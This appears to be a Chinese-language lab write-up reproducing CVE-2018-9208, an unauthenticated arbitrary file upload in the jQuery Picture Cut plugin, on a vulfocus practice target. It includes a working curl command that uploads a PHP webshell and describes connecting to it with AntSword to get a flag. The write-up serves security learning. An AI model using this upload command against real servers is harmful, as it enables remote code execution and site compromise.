当前位置: 首页 > article >正文

漏洞复现-jquery-picture-cut 任意文件上传_(CVE-2018-9208)

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php
curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391


http://www.kler.cn/a/108506.html

相关文章:

  • pyparsing如何实现嵌套捕获
  • 【工具】通过js获取chrome浏览器扩展程序列表id及名称等
  • 基础爬虫案例实战
  • python rabbitmq实现简单/持久/广播/组播/topic/rpc消息异步发送可配置Django
  • 两点间最短距离 - Dijkstra
  • RestTemplate远程调用、服务注册、
  • windows8080端口占用
  • 更新电脑显卡驱动的操作方法有哪些?
  • Mac电脑配置Dart编程环境
  • YUV的红蓝颠倒(反色)的原因及解决
  • 通过Vue自带服务器实现Ajax请求跨域(vue-cli)
  • 【数据分析】上市公司半年报数据分析
  • ListenableFuture和countdownlatch使用example
  • mac 安装homebrew ,golang
  • 基于单片机16位智能抢答器设计
  • 圆锥面积 题解
  • 汇总下之RobotFramework自动化框架的系列文章
  • 计网强化
  • RSA ——Rational Structure Architecture r入门教程
  • 360智慧生活旗舰产品率先接入“360智脑”能力实现升级
  • AI:40-基于深度学习的森林火灾识别
  • SparkStreaming【实例演示】
  • Kotlin协程核心理解
  • 计算机网络重点概念整理-第四章 网络层【期末复习|考研复习】
  • pytorch-fastrcnn识别王者荣耀敌方英雄血条
  • Linux中shell脚本练习